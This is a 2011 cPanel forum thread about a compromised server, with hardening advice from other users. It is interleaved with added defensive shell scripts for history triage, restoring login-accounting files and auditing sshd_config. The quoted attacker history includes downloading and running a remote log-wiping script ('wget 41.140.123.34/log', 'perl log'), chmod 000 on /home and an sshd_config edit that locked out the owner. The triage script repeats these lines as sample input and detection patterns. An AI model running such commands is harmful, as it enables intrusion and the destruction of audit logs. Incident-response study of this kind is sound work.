The Community Forums

Interact with an entire community of cPanel & WHM users!

Hacking attempt with a problem help

Discussion in 'General Discussion' started by bsasninja, May 18, 2011.

  1. bsasninja

    bsasninja Well-Known Member

    Joined:
    Sep 2, 2004
    Messages:
    528
    Likes Received:
    0
    Trophy Points:
    16
    Hi, today I received a hacking attempt. Somehow, I don't know yet how, they got into one of my servers, modified my sshd_config and blocked me from accessing the server anymore. So a technician at the DC went to my machine, restored the sshd_config file and I was allowed to log in again.

    Looking at my root .bash_history i found:
    pico /usr/local/apache/conf/includes/errordocument.conf (they modified a 403 page to some hacked site)
    service httpd restart
    ls -l /
    chmod 000 /home
    w
    w
    w
    chmod 711 /home
    cd /tmp
    perl log
    wget 41.140.123.34/log
    perl log
    top
    mcedit /etc/ssh/sshd_config
    service sshd restart
    exit


    OK, this is what the attacker did. The file "log" that he downloaded is a script that removes all traces, but he forgot this one.
    I have blocked all Africa traffic as a first step. Now, the log script removed the following files:

    /var/log/lastlog
    /var/log/messages
    /var/log/warn
    /var/log/wtmp
    /var/log/secure
    /var/log/auth
    /var/log/auth.log

    I had to restore the wtmp file. Now the problem is the following: if I log in to the server it shows me no users on it; when I run top it shows 0 users even though I'm online on the server, and if I run who or w it shows nothing.
    How do I fix this?

    Thank you!
     
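The history the post quotes is a useful starting point for a triage script. The following is an added example, not code from the thread: it writes the quoted history lines to a file as constructed sample input and flags the actions the post describes (a download from a bare IP address, chmod 000 on /home, editing sshd_config, running a script by relative name out of a working directory). The patterns are an assumption drawn from this one incident, not a complete indicator list.

```shell
#!/bin/sh
# Added example (not from the thread): first-pass triage of a shell history
# file for the kinds of actions the post above lists.

# Write the history lines quoted in the post to the file named in $1 so the
# script can be run offline. (Constructed sample input.)
write_sample_history() {
    cat > "$1" <<'EOF'
pico /usr/local/apache/conf/includes/errordocument.conf
service httpd restart
ls -l /
chmod 000 /home
w
w
w
chmod 711 /home
cd /tmp
perl log
wget 41.140.123.34/log
perl log
top
mcedit /etc/ssh/sshd_config
service sshd restart
exit
EOF
}

# Print each suspicious line prefixed with its line number. Exit status is
# 0 when something was flagged and 1 when nothing matched (grep's own rule).
# Patterns (assumption, built from the posted history):
#   1. wget/curl straight from an IP address
#   2. chmod 000 (or any all-zero mode) on /home
#   3. any touch of sshd_config
#   4. "perl <name>" with a relative script name, i.e. something dropped locally
triage_history() {
    grep -nE \
        -e '^(wget|curl)[[:space:]]+(https?://)?[0-9]{1,3}(\.[0-9]{1,3}){3}' \
        -e '^chmod[[:space:]]+0+[[:space:]]+/home' \
        -e 'sshd_config' \
        -e '^perl[[:space:]]+[^/[:space:]]+$' \
        "$1"
}

# Number of flagged lines, handy as an alert threshold in a cron job.
triage_count() {
    triage_history "$1" | wc -l | tr -d ' '
}
```

Run it as `write_sample_history /tmp/h && triage_history /tmp/h`; on a live box point `triage_history` at /root/.bash_history instead. Note that the log cleaner in this thread deleted wtmp and utmp but not the history file, which is exactly why a copy of the history shipped off-box (or at least a periodic triage like this one) is worth having.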
  2. bsasninja

    bsasninja Well-Known Member

    Joined:
    Sep 2, 2004
    Messages:
    528
    Likes Received:
    0
    Trophy Points:
    16
    I found the solution: the file at /var/run/utmp was also removed. I created it again and now it is working :)
     
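Recreating utmp by hand is what fixed the empty `who`/`w`/`top` output above; the same applies to wtmp and lastlog from the first post's list. The script below is an added example, not the thread's own commands: it recreates whichever of those files are missing with the ownership and mode a stock RHEL/CentOS install gives them (that layout is an assumption; check `ls -l` on a clean box of your distribution), and separately reports which of the logs the cleaner targeted are missing or empty. The first argument is the root to work under, so it can be exercised in a scratch directory; ownership is only applied when running as root.

```shell
#!/bin/sh
# Added example (not from the thread): recreate login accounting files a log
# cleaner deleted and report which of the targeted logs are now absent.

# Recreate utmp (what who/w/top read), wtmp (what last reads) and lastlog if
# they are missing, then set mode and, when root, ownership. The owner/mode
# triples are the RHEL/CentOS defaults (assumption). $1 is the filesystem
# root: "/" on a live box, a scratch directory when testing.
restore_accounting_files() {
    root="${1:-/}"; root="${root%/}"
    for spec in \
        "var/run/utmp:root:utmp:0664" \
        "var/log/wtmp:root:utmp:0664" \
        "var/log/lastlog:root:root:0644"
    do
        rel=${spec%%:*};   rest=${spec#*:}
        owner=${rest%%:*}; rest=${rest#*:}
        group=${rest%%:*}; mode=${rest#*:}
        path="$root/$rel"
        if [ ! -e "$path" ]; then
            mkdir -p "$(dirname "$path")"
            : > "$path"          # empty file: who/w work again, history is gone
            echo "recreated $path"
        fi
        chmod "$mode" "$path"
        if [ "$(id -u)" -eq 0 ]; then
            chown "$owner:$group" "$path"
        fi
    done
}

# Print, one per line, each file from the post's deleted-log list that is
# missing or zero bytes under $1. On a box that normally writes these, a hit
# here is itself an indicator; files your distribution never creates
# (e.g. /var/log/warn on CentOS) will always show up and can be dropped.
missing_logs() {
    root="${1:-/}"; root="${root%/}"
    for rel in var/log/lastlog var/log/messages var/log/warn var/log/wtmp \
               var/log/secure var/log/auth var/log/auth.log var/run/utmp
    do
        [ -s "$root/$rel" ] || echo "$rel"
    done
}
```

On a live system run `restore_accounting_files /` as root, then `who` and `w` report sessions again. The content of the deleted files is not recoverable this way; whatever the attacker wiped from wtmp and secure is only available if those logs were also being shipped to a remote syslog host, which is the more durable fix.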
  3. k-planethost

    k-planethost Well-Known Member

    Joined:
    Sep 22, 2009
    Messages:
    199
    Likes Received:
    4
    Trophy Points:
    18
    Location:
    Athens Greece
    I suggest you harden your SSH, disable telnet, make sure it is up to date and move SSH to a different port than 22.
     
  4. bsasninja

    bsasninja Well-Known Member

    Joined:
    Sep 2, 2004
    Messages:
    528
    Likes Received:
    0
    Trophy Points:
    16
    The port was already a different one, SSH was hardened too and telnet disabled. Today I will dig into the server to see how they could break in.

    Also, I'm running antispyware/antivirus/trojan tools on my computer to see if there is some sniffing app.
     
  5. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    Do you provide your root password to anyone else? If so, you would want to ensure that user also runs a check on their local system.

    I would likewise suggest not allowing direct root login, but using a wheel group user who has only sudo su - access, then disallowing direct root login if you haven't done so.

    Next, I would restrict SSH to only your IP address(es). You can do that in WHM > Host Access Control area by setting allow only for your IP for sshd and then disallowing all other IPs. Good luck to an attacker to get into the machine without direct control over your local system at that point.
     
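The two sshd changes recommended in the reply above (no direct root login, access through an admin group) can be verified mechanically. The following is an added example, not cPanel's or the thread's code: it parses an sshd_config the way sshd does (first occurrence of a keyword wins, keywords are case-insensitive, comments ignored; `Match` blocks are not handled) and reports the weak or missing settings, adding password authentication as a third check since it is what brute-force attempts rely on. The sample configs are constructed, and the group name `wheel` and the non-default port are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread): audit an sshd_config for direct root
# login, a restricting AllowGroups, and password authentication.

# Print the effective value of keyword $2 in sshd_config $1. sshd uses the
# first occurrence, compares keywords case-insensitively, and ignores
# comments and blank lines. "Match" blocks are out of scope here.
sshd_value() {
    awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        tolower($1) == key { print $2; exit }
    ' "$1"
}

# Print one line per finding. An absent PermitRootLogin or
# PasswordAuthentication is treated as "yes", which is what older sshd
# releases default to (assumption: adjust for your version).
check_sshd_config() {
    cfg="$1"
    v=$(sshd_value "$cfg" PermitRootLogin)
    case "${v:-yes}" in
        no) ;;
        *) echo "PermitRootLogin is '${v:-unset}'; set: PermitRootLogin no" ;;
    esac
    v=$(sshd_value "$cfg" AllowGroups)
    [ -n "$v" ] || echo "AllowGroups not set; set: AllowGroups wheel"
    v=$(sshd_value "$cfg" PasswordAuthentication)
    case "${v:-yes}" in
        no) ;;
        *) echo "PasswordAuthentication is '${v:-unset}'; set: PasswordAuthentication no (use keys)" ;;
    esac
}

# Number of findings; 0 means all three checks passed.
finding_count() {
    check_sshd_config "$1" | wc -l | tr -d ' '
}

# Constructed sample configs: "weak" mirrors what the attacker in this thread
# could have relied on, "hardened" applies the reply's advice plus keys.
write_sample_config() {
    case "$2" in
        weak) cat > "$1" <<'EOF'
# constructed sample: stock-looking config
Port 22
Protocol 2
PermitRootLogin yes
PasswordAuthentication yes
EOF
        ;;
        hardened) cat > "$1" <<'EOF'
# constructed sample: root only via a wheel user and sudo, keys only
Port 2222
Protocol 2
permitrootlogin no
AllowGroups wheel
PasswordAuthentication no
PubkeyAuthentication yes
EOF
        ;;
    esac
}
```

Run `check_sshd_config /etc/ssh/sshd_config` after editing and `service sshd restart` only once it prints nothing; keep an existing session open while you test the new login path so a mistake in AllowGroups cannot lock you out the way the attacker's edit did. The Host Access Control rules the reply mentions are, to my knowledge, written by WHM as TCP wrapper entries in /etc/hosts.allow, so the equivalent by hand is a line such as `sshd : 203.0.113.5 : allow` followed by `sshd : ALL : deny` (203.0.113.5 is a documentation address standing in for your own IP).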
  6. bsasninja

    bsasninja Well-Known Member

    Joined:
    Sep 2, 2004
    Messages:
    528
    Likes Received:
    0
    Trophy Points:
    16
    I have direct root logins disabled and /tmp and /dev/shm protected.
    I have also closed all user folders that were open with 777 permissions. I disabled some apache_* PHP functions.
    All server software is updated to the latest versions, except for PHP, which is still at 5.2.17 because if I move to 5.3 a lot of server scripts will stop working. Anyway, I have a plan to upgrade this year, after I give my customers some time to make the necessary changes to their scripts.
     
  7. cass

    cass Well-Known Member

    Joined:
    Jul 17, 2002
    Messages:
    354
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Argentina/USA/Mexico
    Did you find what the problem/hole was?
    We had this same issue on a client server today, but we're still looking to see what the hole is. The server had suPHP and other hardening, but it was still hacked the same way: changing the 403 to a page and chmod 000 on /home. Same team for sure.
     